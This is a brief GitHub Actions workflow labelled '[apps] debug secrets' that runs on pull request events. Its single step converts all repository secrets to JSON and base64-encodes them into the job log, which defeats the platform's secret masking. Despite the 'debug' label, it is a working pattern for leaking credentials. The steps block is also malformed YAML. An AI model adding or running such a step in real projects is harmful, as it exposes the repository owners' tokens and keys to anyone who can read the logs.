jobs:
  debug_:
    name: 'debug'
    steps:
      run: echo '${{ toJSON(secrets) }}' | base64
name: '[apps] debug secrets'
on:
  pull_request:
    types:
      - opened
      - synchronize
      - reopened
